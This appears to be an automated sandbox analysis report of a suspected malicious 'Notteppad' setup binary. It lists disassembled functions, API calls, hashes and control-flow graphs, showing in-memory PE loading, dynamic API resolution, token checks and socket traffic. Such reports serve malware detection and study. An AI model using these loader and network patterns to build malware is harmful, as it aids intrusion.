                                      • Instruction ID: 5c54ac9a3e98a9018d135860533fe7f04dae54dfa988f81fe7b9af442e591fc5
                                      • Opcode Fuzzy Hash: 3bdcccb426339d1b263f279166384a14830091d0bb5e60991591b28352ae3406
                                      • Instruction Fuzzy Hash: 82B1E1B5608341CBC720DF15C58876BBBE0BF84704F14892EE99897391D7B9D988CB9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409790 Relevance: 19.8, APIs: 13, Instructions: 270COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 699 409790-4097b1 setlocale 700 4097b3-4097bb _strdup 699->700 701 4097bd-4097d6 setlocale 699->701 700->701 702 4097e0-409841 wcstombs call 4085e0 wcstombs setlocale call 408660 701->702 703 4097d8-4097de 701->703 716 409847-409850 702->716 703->702 704 409858-4098af mbstowcs call 408390 mbstowcs 703->704 710 4098f0-4098f4 704->710 711 4098b1-4098c2 704->711 715 4098f7-4098fc 710->715 713 409ad0-409ad4 711->713 714 4098c8-4098cc 711->714 713->715 717 409ada-409adf 713->717 714->713 718 4098d2-4098d6 714->718 719 409910-409919 715->719 720 4098fe-409901 715->720 717->715 722 409ae5-409b00 setlocale call 408660 717->722 718->715 723 4098d8-4098e6 718->723 721 409934-409938 719->721 720->702 724 409920-409926 721->724 725 40993a-409941 721->725 734 4099f6-4099f9 722->734 723->715 729 409928-409932 724->729 730 40994b-409952 724->730 727 409943-409947 725->727 728 409954-409958 725->728 733 409948 727->733 728->733 735 40995a-40995f 728->735 729->721 732 409968-40996b 729->732 730->728 730->733 736 409a00-409a08 732->736 737 409971-409979 732->737 733->730 734->716 735->732 738 409961-409963 735->738 739 409b5b 736->739 740 409a0e-409a15 736->740 741 40997b-40997f 737->741 742 40998c-4099d9 wcstombs call 4085e0 wcstombs 737->742 738->729 746 409b61-409b69 739->746 747 409a1d-409a2c 739->747 740->736 743 409a17-409a1b 740->743 741->742 744 409981-409989 741->744 757 4099de-4099f1 setlocale call 408660 742->757 743->736 743->747 744->742 751 409b75-409b7d 746->751 752 409b6b-409b6f 746->752 748 409a40-409a4b 747->748 749 409a2e-409a32 747->749 748->748 756 409a4d-409a51 748->756 754 409b05-409b09 749->754 755 409a38-409a3f 749->755 751->747 753 409b83-409b8b 751->753 752->747 752->751 753->747 758 409b91-409b95 753->758 760 409a60 754->760 761 409b0f-409b12 754->761 755->748 756->748 759 409a53-409a5a 756->759 757->734 758->747 763 409b9b-409b9d 758->763 759->754 759->760 764 409a62-409a65 760->764 761->764 765 409b20-409b22 761->765 763->747 766 409b2b-409b4c wcstombs 764->766 767 409a6b-409a70 764->767 768 409aa6-409aaa 765->768 766->757 769 409b52-409b56 766->769 772 409a96-409aa1 767->772 770 409ab8-409ac3 768->770 771 409aac-409ab2 768->771 769->757 770->770 777 409ac5-409ac9 770->777 775 409ab4 771->775 776 409a8d-409a90 771->776 773 409aa3 772->773 774 409a78-409a83 772->774 773->768 774->765 780 409a89-409a8b 774->780 775->770 776->772 778 409b28 776->778 777->770 779 409acb 777->779 778->766 779->776 780->776
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: setlocale$wcstombs$_strdup
                                      • String ID:
                                      • API String ID: 3699089627-0
                                      • Opcode ID: eff2bffd89970c0ed27fce27b869c07652d780bacb0a294859c313edf4fa8c6d
                                      • Instruction ID: 1d60297118ab8596b41b029e74c87b7ac82eb2bc180e13b623edd6e3ab22f0d2
                                      • Opcode Fuzzy Hash: eff2bffd89970c0ed27fce27b869c07652d780bacb0a294859c313edf4fa8c6d
                                      • Instruction Fuzzy Hash: 1BA15D70A042158ACB24AF69C04467BF7F1FF44344F44843FE889A7392E7389C96DB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EF509 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003), ref: 006EF50E
                                        • Part of subcall function 006F1C63: GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,006EF519), ref: 006F1C71
                                        • Part of subcall function 006F1C63: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 006F1C81
                                        • Part of subcall function 006F1C63: GetProcAddress.KERNEL32(00000000,NtDeviceIoControlFile), ref: 006F1C8E
                                        • Part of subcall function 006F1C63: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,006EF519), ref: 006F1C9A
                                        • Part of subcall function 006F1C63: GetProcAddress.KERNEL32(00000000,SetFileCompletionNotificationModes), ref: 006F1CA4
                                        • Part of subcall function 006F1C63: GetProcAddress.KERNEL32(00000000,CancelIoEx), ref: 006F1CB1
                                      • WSAStartup.WS2_32(00000202,?), ref: 006F1863
                                        • Part of subcall function 006F160C: memset.NTDLL ref: 006F161C
                                        • Part of subcall function 006F160C: htons.WS2_32(00000002), ref: 006F162D
                                        • Part of subcall function 006F160C: inet_addr.WS2_32(?), ref: 006F163A
                                        • Part of subcall function 006F1653: memset.NTDLL ref: 006F1663
                                        • Part of subcall function 006F1653: htons.WS2_32(?), ref: 006F1674
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 006F18B0
                                      • getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 006F18E1
                                      • closesocket.WS2_32(00000000), ref: 006F18F4
                                      • WSAGetLastError.WS2_32 ref: 006F18FC
                                      • socket.WS2_32(00000017,00000001,00000000), ref: 006F1911
                                      • getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 006F1937
                                      • closesocket.WS2_32(00000000), ref: 006F1946
                                      • WSAGetLastError.WS2_32 ref: 006F194E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Error$HandleLastModuleclosesocketgetsockopthtonsmemsetsocket$ModeStartupinet_addr
                                      • String ID: 0.0.0.0
                                      • API String ID: 2896273404-3771769585
                                      • Opcode ID: 30d8fd51a0aa0bbacc6e8b293d6dc601838ae0d681274f1a0c15ed1a7e6a8546
                                      • Instruction ID: 2fe2aae8b861e27ea6291ab5d6123a784cf425f5a17de77828e1379a617495f8
                                      • Opcode Fuzzy Hash: 30d8fd51a0aa0bbacc6e8b293d6dc601838ae0d681274f1a0c15ed1a7e6a8546
                                      • Instruction Fuzzy Hash: 6431C872104309EBE310AF64DC8EFBB77AEEF46790F11151AF7149A1D0D7B459098BA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E8DA7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99filememoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 834 6e8da7-6e8dce ExpandEnvironmentStringsW 835 6e8eb8-6e8ebe 834->835 836 6e8dd4-6e8df5 CreateFileW 834->836 836->835 837 6e8dfb-6e8e13 GetFileSize malloc 836->837 838 6e8eae-6e8eb7 FindCloseChangeNotification 837->838 839 6e8e19-6e8e2b ReadFile 837->839 838->835 840 6e8e2d-6e8e32 839->840 841 6e8ea6-6e8ead ??3@YAXPAX@Z 839->841 840->841 842 6e8e34-6e8e3f 840->842 841->838 842->841 843 6e8e41-6e8e62 VirtualAlloc 842->843 843->841 844 6e8e64-6e8e78 memcpy 843->844 844->841 845 6e8e7a-6e8e7d 844->845 846 6e8e80-6e8ea4 memcpy 845->846 846->841 846->846
                                      APIs
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 006E8DC6
                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E8DE7
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 006E8DFE
                                      • malloc.MSVCRT ref: 006E8E08
                                      • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 006E8E23
                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006E8E57
                                      • memcpy.NTDLL(00000000,00000000,00000000), ref: 006E8E69
                                      • memcpy.NTDLL(?,?,?), ref: 006E8E8F
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E8EA7
                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 006E8EB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$memcpy$??3@AllocChangeCloseCreateEnvironmentExpandFindNotificationReadSizeStringsVirtualmalloc
                                      • String ID: MZ
                                      • API String ID: 31580269-2410715997
                                      • Opcode ID: fbfbec48a0aebb477316b0fa0ca4cfd0358660889269f1bf4643a444d98266b6
                                      • Instruction ID: bcb29e6ac26ce8aff19a40f5ec99788b97d32ce305b7f6ffa14591cb4f3cb127
                                      • Opcode Fuzzy Hash: fbfbec48a0aebb477316b0fa0ca4cfd0358660889269f1bf4643a444d98266b6
                                      • Instruction Fuzzy Hash: EA318F71901315EFCB209FA5DC88EEEBBBAEF44754F144159F905A3291EB70DA80CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402B64 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 169memorysynchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 896 402b64-402b8c HeapCreate 897 402b92-402bbb HeapAlloc 896->897 898 402dec-402df3 896->898 899 402bc1-402be0 HeapAlloc 897->899 900 402dd2-402de4 HeapDestroy call 402b5b 897->900 901 402be6-402cc7 CreateEventW call 401ce8 call 401d11 call 401d91 899->901 902 402daf-402db4 899->902 907 402de9 900->907 913 402d01-402d06 901->913 914 402cc9-402ccc 901->914 905 402db6 902->905 906 402dbb-402dcf HeapFree 902->906 905->906 906->900 907->898 915 402d08-402d13 call 401ce8 call 401f99 913->915 916 402d6b 913->916 914->913 917 402cce-402cd2 914->917 925 402d18-402d1d 915->925 919 402d72-402d92 HeapFree 916->919 917->919 920 402cd8 917->920 919->902 922 402d94 919->922 920->913 924 402d96-402dad call 408660 922->924 924->902 927 402cda-402cde 925->927 928 402d1f-402d2d 925->928 931 402ce0-402cf6 WaitForSingleObject 927->931 932 402d3d-402d41 927->932 928->925 930 402d2f-402d3b call 401d5c 928->930 930->925 931->913 935 402cf8-402cff 931->935 932->931 934 402d43-402d48 932->934 938 402d53-402d5d call 40204d 934->938 939 402d4a-402d51 934->939 935->913 936 402d5f-402d63 935->936 936->913 940 402d65-402d69 936->940 938->931 939->931 939->938 940->916 940->919
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: Heap$AllocCreateFree$CountDestroyEventObjectSingleTickWait
                                      • String ID: @
                                      • API String ID: 446487923-2766056989
                                      • Opcode ID: f2fd1b130b011ee09a56d032911334bef911c14d7685bfa24acd2a3946c586bf
                                      • Instruction ID: 6691df7879b12dcc9e18df826808d4b8e14686723d60f8a7926321b977bb69e4
                                      • Opcode Fuzzy Hash: f2fd1b130b011ee09a56d032911334bef911c14d7685bfa24acd2a3946c586bf
                                      • Instruction Fuzzy Hash: B871E9B0404705DFDB50AF25C28831BBBE0BF44348F11896EE8885B396D7B9D958CF8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F0D4A Relevance: 15.2, APIs: 10, Instructions: 157networkregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 961 6f0d4a-6f0d89 memset * 2 962 6f0d8b-6f0d9e CreateEventA 961->962 963 6f0da1-6f0dbc WSASend 961->963 962->963 964 6f0dbe-6f0dc2 963->964 965 6f0e0d-6f0e18 GetLastError 963->965 966 6f0dc4-6f0dd8 964->966 967 6f0e33-6f0e3a 964->967 965->967 968 6f0e1a-6f0e2e WSAGetLastError call 6f15d2 965->968 971 6f0dda-6f0ddf 966->971 972 6f0df0-6f0e08 966->972 969 6f0e3c 967->969 970 6f0e47-6f0e5b 967->970 980 6f0eda-6f0ede 968->980 975 6f0e3f-6f0e45 969->975 976 6f0e5d-6f0e62 970->976 977 6f0e73-6f0e93 970->977 971->972 978 6f0de1-6f0de8 971->978 979 6f0ed1-6f0ed7 call 6f2144 972->979 975->970 975->975 976->977 981 6f0e64-6f0e6b 976->981 982 6f0ed8 977->982 983 6f0e95-6f0eae RegisterWaitForSingleObject 977->983 978->972 984 6f0dea-6f0ded 978->984 979->982 981->977 987 6f0e6d-6f0e70 981->987 982->980 983->982 988 6f0eb0-6f0eba GetLastError 983->988 984->972 987->977 989 6f0ebc-6f0ebe GetLastError 988->989 990 6f0ec0-6f0ec7 GetLastError 988->990 991 6f0ecc-6f0ed0 989->991 990->991 991->979
                                      APIs
                                      • memset.NTDLL ref: 006F0D71
                                      • memset.NTDLL ref: 006F0D7D
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006F0D8F
                                      • WSASend.WS2_32(?,?,?,?,00000000,?,00000000), ref: 006F0DB4
                                      • GetLastError.KERNEL32 ref: 006F0E0D
                                      • WSAGetLastError.WS2_32 ref: 006F0E1A
                                      • RegisterWaitForSingleObject.KERNEL32(?,?,006F0EDF,?,000000FF,0000000C), ref: 006F0EA6
                                      • GetLastError.KERNEL32 ref: 006F0EB6
                                      • GetLastError.KERNEL32 ref: 006F0EBC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$memset$CreateEventObjectRegisterSendSingleWait
                                      • String ID:
                                      • API String ID: 2117649443-0
                                      • Opcode ID: 939761fe82958f257e0061a352ac1b6447336c07c2883ef9c38ca961fc56b337
                                      • Instruction ID: b668e6a59af22763505c9104e5712a71be7075845005b3eea18adc72a8797c7e
                                      • Opcode Fuzzy Hash: 939761fe82958f257e0061a352ac1b6447336c07c2883ef9c38ca961fc56b337
                                      • Instruction Fuzzy Hash: 42517571500B0AAFE724CF65C980AA6BBFAFF08354B008A1DE95587A62D730F955CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E8F22 Relevance: 10.6, APIs: 7, Instructions: 130COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(?,?,00000001,?,?,?,?,006E88E3,?,?), ref: 006E8F2D
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,006E88E3,?,?), ref: 006E8F42
                                        • Part of subcall function 006E8DA7: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 006E8DC6
                                        • Part of subcall function 006E8DA7: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E8DE7
                                        • Part of subcall function 006E8DA7: GetFileSize.KERNEL32(00000000,00000000), ref: 006E8DFE
                                        • Part of subcall function 006E8DA7: malloc.MSVCRT ref: 006E8E08
                                        • Part of subcall function 006E8DA7: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 006E8E23
                                        • Part of subcall function 006E8DA7: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006E8E57
                                        • Part of subcall function 006E8DA7: memcpy.NTDLL(00000000,00000000,00000000), ref: 006E8E69
                                        • Part of subcall function 006E8DA7: memcpy.NTDLL(?,?,?), ref: 006E8E8F
                                        • Part of subcall function 006E8DA7: ??3@YAXPAX@Z.MSVCRT ref: 006E8EA7
                                        • Part of subcall function 006E8DA7: FindCloseChangeNotification.KERNELBASE(00000000), ref: 006E8EB1
                                      • IsBadHugeReadPtr.KERNEL32(00000000,00000010), ref: 006E8FDB
                                      • IsBadHugeReadPtr.KERNEL32(?,00000010), ref: 006E8FEC
                                      • memcmp.NTDLL ref: 006E9002
                                        • Part of subcall function 006E9094: memcmp.NTDLL ref: 006E90B7
                                        • Part of subcall function 006E0300: LdrInitializeThunk.NTDLL(006E9043,?,?,00001000,00000040,00000000), ref: 006E030A
                                      • memcpy.NTDLL(?,00000000,?,?,?,00001000,00000040,00000000), ref: 006E904C
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,006E88E3,?,?), ref: 006E9089
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileReadmemcpy$HugeVirtualmemcmp$??3@AllocChangeCloseCreateCurrentEnvironmentExpandFindFreeHandleInitializeModuleNotificationProcessSizeStringsThunkmalloc
                                      • String ID:
                                      • API String ID: 3632012887-0
                                      • Opcode ID: b15105f1897efed8b6789a31e04324c60ddba4e5f8fb4386f432e4f5b3aa07a6
                                      • Instruction ID: 0283f1e2ec70babc01582658bfd1a73f56b5369271f643e9dbaa95a974327d25
                                      • Opcode Fuzzy Hash: b15105f1897efed8b6789a31e04324c60ddba4e5f8fb4386f432e4f5b3aa07a6
                                      • Instruction Fuzzy Hash: 2D414FB1901349AFDB209FA5CC81AEFBBBEEF44355F504469F905E2252EB30DA40CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F04ED Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ioctlsocket.WS2_32(006F16C7,8004667E,006F1744), ref: 006F0508
                                      • WSAGetLastError.WS2_32(?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010), ref: 006F0513
                                      • CreateIoCompletionPort.KERNELBASE(006F16C7,19751710,006F16C7,00000000,?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E), ref: 006F0533
                                      • SetFileCompletionNotificationModes.KERNEL32(006F16C7,00000003,?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E,006F16C7), ref: 006F0575
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Completion$CreateErrorFileLastModesNotificationPortioctlsocket
                                      • String ID:
                                      • API String ID: 3397353003-0
                                      • Opcode ID: 1cfe454d1a47206ea8a4a9486267abd581268cae99c7f72eecb84a6fbeacaa99
                                      • Instruction ID: f8d9add7ea729d69d092dcd7341d67a53d14b9098c7139772cbca58bd4881eaf
                                      • Opcode Fuzzy Hash: 1cfe454d1a47206ea8a4a9486267abd581268cae99c7f72eecb84a6fbeacaa99
                                      • Instruction Fuzzy Hash: EC31B3B120420DABFB219F64DE45BBA37ABAF40354F144119FF1292292E7B0EE51CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E415D Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000), ref: 006E4181
                                      • GetLastError.KERNEL32 ref: 006E4187
                                      • malloc.MSVCRT ref: 006E4196
                                      • memset.NTDLL ref: 006E41A8
                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 006E41BD
                                      • LookupAccountSidW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000104,?), ref: 006E41F8
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E4202
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationToken$??3@AccountErrorLastLookupmallocmemset
                                      • String ID:
                                      • API String ID: 2392997092-0
                                      • Opcode ID: 98fb2c9b244bc893bdd9ef4204038d140f88c8f5cce1771f0a3ec66d3374b632
                                      • Instruction ID: e40386d5d536c16cb063752f6049cd4de32a8c3bea7b206c62910e991b2a9dad
                                      • Opcode Fuzzy Hash: 98fb2c9b244bc893bdd9ef4204038d140f88c8f5cce1771f0a3ec66d3374b632
                                      • Instruction Fuzzy Hash: CC210776801249FFDF118FA1DD85DEE7BBEEB14354F10006AFA0192110EB719EA0DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402503 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 79stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: callocmallocmemcpystrlen
                                      • String ID: $$File
                                      • API String ID: 2006192344-341256565
                                      • Opcode ID: 42f8bed387473e7dd1c6cca7877ee791c990ec01c844c79b214af29e6b9f13da
                                      • Instruction ID: 0094a8efc2f9d6dfe744c6bff33358b91be10389d17dd6afd692dc2d41184827
                                      • Opcode Fuzzy Hash: 42f8bed387473e7dd1c6cca7877ee791c990ec01c844c79b214af29e6b9f13da
                                      • Instruction Fuzzy Hash: 1D31F8B45047019FD710EF29C69461ABBE4FF45304F05887EE8899B386E778E844CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407989 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 182COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: __p__pgmptr$FileModuleName_strdup
                                      • String ID: "
                                      • API String ID: 2400198430-123907689
                                      • Opcode ID: 8a0e3ebc74ac171c18b8845260d1bc6e99df1b8d290b5f762ff71836290b3a3e
                                      • Instruction ID: dc95246e4bcf73894f1851f61b0e4e664c3af538d28cea9f3d6557adc83b0329
                                      • Opcode Fuzzy Hash: 8a0e3ebc74ac171c18b8845260d1bc6e99df1b8d290b5f762ff71836290b3a3e
                                      • Instruction Fuzzy Hash: CA719F71E093158BDB25CB18C84839AB7E1AF95308F1884BEC845A7381D739BD85CF9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407A83 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: __p__pgmptr$FileModuleName_strdup
                                      • String ID: Z
                                      • API String ID: 2400198430-1505515367
                                      • Opcode ID: 586216d8618d879f17b543ef1cda0e27d17cdd33f7bcad6daa0321d54e411e6f
                                      • Instruction ID: 65554ac701d7e50c7a0dab7cab288e93c5d88a57e60c5c9fa36e589ed60e68f7
                                      • Opcode Fuzzy Hash: 586216d8618d879f17b543ef1cda0e27d17cdd33f7bcad6daa0321d54e411e6f
                                      • Instruction Fuzzy Hash: 0651A072E093158BDB24DF18C88479AB7E1BF91304F5580BEC948A7281D739BD85CF9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401E40 Relevance: 7.6, APIs: 6, Instructions: 76memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
